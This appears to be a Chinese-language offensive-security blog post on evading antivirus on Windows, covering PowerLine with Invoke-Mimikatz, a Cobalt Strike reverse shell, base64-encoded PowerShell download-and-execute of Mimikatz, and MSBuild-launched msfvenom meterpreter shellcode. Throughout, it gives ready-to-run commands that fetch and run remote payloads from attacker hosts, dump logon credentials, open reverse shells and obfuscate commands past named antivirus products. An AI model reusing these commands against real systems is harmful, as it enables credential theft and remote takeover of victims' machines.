Powershell AV Evasion. Running Mimikatz with PowerLine

PowerShell默认存在于所有Windows 7+上，并且正在成为在Windows中执行所需脚本的最常用方法。因此产品开始阻止或警告PowerShell的使用。
网络上也有很多关于ps的混淆脚本和混淆技巧，对于国内的一些杀毒其实已经够了，但是如果遇到了比如eset/avast等杀毒就会被拦截了。
经过测试，检查防病毒是否检测到此行为，因此在执行阶段就已经失效。

Powerline是由Brian Fehrman（@fullmetalcache）创建的一个很棒的工具，允许调用PowerShell脚本。它是用C＃编写的（不直接调用PowerShell），可以完全从命令行使用。

构建和使用：
部署构建很简单
1、从github下载代码https://github.com/fullmetalcache/PowerLine
2、运行build.bat
3、更新UserConf.xml文档以包含您要包含的ps脚本的URL
4、运行plbuilder.exe，powerline.exe生成成功
使用：
当你构件好powerline后接下来就是把powerline.exe放到目标机器上。可以通过shell上传或者远程下载功能。

certutil -urlcache -split -f http://atackerIP/PowerLine.exe PowerLine.exe

上传后执行（默认的userconf.xml中带的是invoke-mimikatz）:

PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"privilege::debug`\" `\"sekurlsa::logonPasswords`\"\""

Avast(图片来自引用博客):

国内杀毒（图片来自本地测试）：

可以看到已经达到了绕过的需求。
可以通过修改默认导入的ps脚本来满足不同环境下的需求。

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

引用：

    https://github.com/fullmetalcache/PowerLine/blob/master/README.md
 https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html

Cobalt Strike安装使用并回弹一个shell
Cobalt Strike是一款渗透测试神器，常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。也是一个C/S结构的工具
首先登陆远程服务器，cs是一个团队协作的工具，而且可以隐藏后端攻击者ip，所以远程登录到服务器上，并安装java8

在服务器上执行
./teamserver 10.14.4.16 123
ip是你服务器的公网/内网地址 123是连接密码

在客户端上运行。

用户名随意，密码123
连接后

这就已经成功连接到服务器上了。

接下来创建一个监听事件

在这里创建一个监听事件，监听端口选择8088

beacon的地址也选择外网地址反射回的，如果前端没有其他转发服务器的话。

监听建立成功。
接下来生成shell
attacks》web drive-by》

目标机器是win7，那么我使用powershell来远程下载。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.14.4.16:80/aaaa'))"

生成代码已经给出了

在win下执行命令

可以看到，已经上线了。
稍后可能会写怎么绕过火绒的提醒，执行shell

绕过杀毒执行ps-实现无文件落地导hash

直接执行。三款国内杀毒只有360拦截了执行。
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx.xx/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds"

Base64编码后执行
$text = 'Hello World!'

替换Hello World!

powershell.exe -eNco SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA=

替换后执行。

绕过并导出了hash。这个办法在2008、win7上遇到装有360等国内杀毒的时候可以尝试下

Msbuild 利用reverse-shell

msbuild简介：
Microsoft Build Engine是一个用于构建应用程序的平台。 该引擎（也称为MSBuild）为控制构建平台如何处理和生成软件的项目文件提供了一个xm l schema。 ... Visual Studio 中的项目文件（.csproj、.vbproj、vcxproj 等）含有相应的MSBuild xm l 代码。
利用思路：
Msbuild从.net4.0中可以嵌入执行C#代码，所以可以将xml文件通过msbuild编译执行xml当做shellcode启动器。
使用Msfvenom生成CSharp shellcode
使用MSBuild平台将shellcode启动器其编译为可执行程序。
绕过av白名单，可以获得受害者机器的反向shell。
1、构造1.csproj（等待编译的文件）
文件内容：
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.99.178 lport=1233 -f csharp

并将生成的shellcode复制到xml中原shellcode段。
注意这里讲buf改成shellcode。
从攻击机中监听1233端口。等待反向连接

可以看到已经成功反弹meterpreter。三款杀毒均未报毒。

看到三好学生以前的文章，还可以执行ps命令和mimikatz
相关代码在上面
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
可以通过这样混淆来bypass av。

参考：
https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/
https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/